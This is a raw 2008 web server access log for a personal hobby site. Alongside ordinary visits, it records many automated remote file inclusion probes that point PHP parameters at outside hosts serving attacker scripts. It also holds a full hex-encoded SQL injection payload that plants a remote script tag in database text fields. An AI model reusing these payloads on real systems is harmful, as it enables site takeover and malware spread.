81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.15.55.100 - - [22/Aug/2008:07:51:06 -0500] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
78.129.138.76 - - [22/Aug/2008:07:51:13 -0500] "GET /logs/index.php?sourcedir=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
78.129.138.76 - - [22/Aug/2008:07:51:13 -0500] "GET /index.php?sourcedir=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.181.99.47 - - [22/Aug/2008:07:51:39 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://utilz.info/a4? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:51:40 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://utilz.info/a4? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
80.67.20.130 - - [22/Aug/2008:07:52:07 -0500] "GET /logs//contenido.php?sec=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:07:52:07 -0500] "GET //contenido.php?sec=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:07:53:06 -0500] "GET /logs//contenido.php?sec=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:07:53:06 -0500] "GET //contenido.php?sec=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
202.181.99.47 - - [22/Aug/2008:07:53:45 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://utilz.info/a4? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:53:45 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://utilz.info/a4? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:54:02 -0500] "GET /logs/access_log.1214524800//config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:54:03 -0500] "GET //config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:54:03 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:54:17 -0500] "GET /logs/access_log.1206230400/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:54:21 -0500] "GET /error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:07:54:21 -0500] "GET /logs/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:55:28 -0500] "GET /logs/access_log.1203120000//faqsupport/samplefaqsupport.php?path[docroot]=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:55:28 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://utilz.info/a4? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:55:29 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:56:20 -0500] "GET /logs//citywriter/head.php?path=http://utilz.info/a4? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:07:56:21 -0500] "GET //citywriter/head.php?path=http://utilz.info/a4? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.186.1.54 - - [22/Aug/2008:07:57:52 -0500] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
89.186.1.54 - - [22/Aug/2008:07:57:54 -0500] "GET //cyberfolio/portfolio/msg/view.php?av=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
74.6.8.121 - - [22/Aug/2008:08:00:19 -0500] "GET /logs/access_log.1186876800 HTTP/1.0" 200 217668 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
140.130.118.2 - - [22/Aug/2008:08:00:35 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
140.130.118.2 - - [22/Aug/2008:08:00:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
202.181.99.47 - - [22/Aug/2008:08:01:05 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:01:56 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://utilz.info/a4? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:01:56 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://utilz.info/a4? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.6.8.121 - - [22/Aug/2008:08:03:52 -0500] "GET /logs/access_log.1195171200 HTTP/1.0" 200 274768 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.181.99.47 - - [22/Aug/2008:08:04:17 -0500] "GET /logs/access_log.1214179200//config/dbutil.bck.php?confdir=http://utilz.info/a4? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:07:14 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://utilz.info/a4? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:07:14 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://utilz.info/a4? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:08:07:28 -0500] "GET /logs/access_log.1201564800/error.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:08:07:36 -0500] "GET /logs/db.php?path_local=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:08:07:37 -0500] "GET /db.php?path_local=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:08:07:44 -0500] "GET /logs/db.php?path_local=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:08:07:44 -0500] "GET /db.php?path_local=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
86.208.107.25 - - [22/Aug/2008:08:08:41 -0500] "GET /logs/access_log.1206230400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
86.208.107.25 - - [22/Aug/2008:08:08:43 -0500] "GET /logs/access_log.1206230400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
202.181.99.47 - - [22/Aug/2008:08:09:02 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:09:02 -0500] "GET /errors.php?error=http://utilz.info/a4? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:09:02 -0500] "GET /logs/errors.php?error=http://utilz.info/a4? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:11:09 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://utilz.info/a4? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:11:09 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://utilz.info/a4? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:11:57 -0500] "GET /logs/access_log.1213488000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.241.219.5 - - [22/Aug/2008:08:14:28 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
212.241.219.5 - - [22/Aug/2008:08:14:28 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
203.98.87.14 - - [22/Aug/2008:08:14:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
203.98.87.14 - - [22/Aug/2008:08:14:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
67.212.173.42 - - [22/Aug/2008:08:17:45 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:08:17:45 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://christiansongwriters.org/evanescence/cid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
77.79.246.241 - - [22/Aug/2008:08:17:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
77.79.246.241 - - [22/Aug/2008:08:17:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
70.85.201.66 - - [22/Aug/2008:08:18:14 -0500] "GET /logs//includes/include_once.php?include_file=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
70.85.201.66 - - [22/Aug/2008:08:18:14 -0500] "GET //includes/include_once.php?include_file=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
89.218.85.18 - - [22/Aug/2008:08:18:42 -0500] "GET /logs/index.php?dept=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:08:18:43 -0500] "GET /index.php?dept=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.22.85.186 - - [22/Aug/2008:08:19:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
64.22.85.186 - - [22/Aug/2008:08:19:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:08:19:14 -0500] "GET /?custompluginfile[]=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.90 - - [22/Aug/2008:08:19:15 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.64"
216.139.67.90 - - [22/Aug/2008:08:19:15 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.64"
64.185.237.191 - - [22/Aug/2008:08:19:15 -0500] "GET /logs/?custompluginfile[]=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 200 96216 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.185.237.191 - - [22/Aug/2008:08:19:17 -0500] "GET /logs/access_log.1206230400/?custompluginfile[]=http://acceicc.com/uploads/idr.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
83.168.226.152 - - [22/Aug/2008:08:19:30 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:08:19:30 -0500] "GET /index.php?DOCUMENT_ROOT=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.181.99.47 - - [22/Aug/2008:08:19:55 -0500] "GET /logs/access_log.1214524800//faqsupport/samplefaqsupport.php?path[docroot]=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:20:37 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:20:37 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://utilz.info/a4? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
74.6.8.121 - - [22/Aug/2008:08:21:05 -0500] "GET /logs/access_log.1192147200 HTTP/1.0" 200 227748 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.194.76.177 - - [22/Aug/2008:08:22:24 -0500] "GET //errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
82.194.76.177 - - [22/Aug/2008:08:22:24 -0500] "GET /logs//errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
212.241.219.5 - - [22/Aug/2008:08:25:11 -0500] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
212.241.219.5 - - [22/Aug/2008:08:25:12 -0500] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
208.111.154.101 - - [22/Aug/2008:08:27:59 -0500] "GET /artwork/whirligigs.htm HTTP/1.0" 200 985 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [22/Aug/2008:08:27:59 -0500] "GET /artwork/unclesamwhilrligig.jpg HTTP/1.0" 200 59934 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [22/Aug/2008:08:27:59 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.0" 200 55770 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [22/Aug/2008:08:27:59 -0500] "GET /artwork/LA%27s-finest.png HTTP/1.0" 200 56425 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [22/Aug/2008:08:27:59 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
203.98.87.14 - - [22/Aug/2008:08:28:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.98.87.14 - - [22/Aug/2008:08:28:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:08:29:20 -0500] "GET /index.php?DOCUMENT_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
88.191.62.117 - - [22/Aug/2008:08:30:29 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://secret-wishes.net/images/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.191.62.117 - - [22/Aug/2008:08:30:29 -0500] "GET /index.php?DOCUMENT_ROOT=http://secret-wishes.net/images/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
69.46.23.105 - - [22/Aug/2008:08:34:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
69.46.23.105 - - [22/Aug/2008:08:34:31 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
206.191.69.149 - - [22/Aug/2008:08:35:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:24 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:25 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
206.191.69.149 - - [22/Aug/2008:08:35:31 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
202.181.99.47 - - [22/Aug/2008:08:36:00 -0500] "GET /logs/access_log.1214438400//faqsupport/samplefaqsupport.php?path[docroot]=http://utilz.info/a4? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:36:12 -0500] "GET /logs/access_log.1208736000/errors.php?error=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:08:36:44 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:08:36:44 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:08:36:49 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
212.241.219.5 - - [22/Aug/2008:08:38:59 -0500] "GET /logs/access_log.1205366400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.803"
212.241.219.5 - - [22/Aug/2008:08:38:59 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
212.241.219.5 - - [22/Aug/2008:08:39:00 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/-ZeR0-/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
89.208.43.121 - - [22/Aug/2008:08:39:32 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:08:39:32 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
202.181.99.47 - - [22/Aug/2008:08:41:54 -0500] "GET /logs/access_log.1214438400//modules/xfsection/modify.php?dir_module=http://utilz.info/a4? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:08:42:28 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
217.113.53.6 - - [22/Aug/2008:08:42:28 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
83.168.226.152 - - [22/Aug/2008:08:43:01 -0500] "GET //skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
198.66.222.121 - - [22/Aug/2008:08:43:08 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
198.66.222.121 - - [22/Aug/2008:08:43:08 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
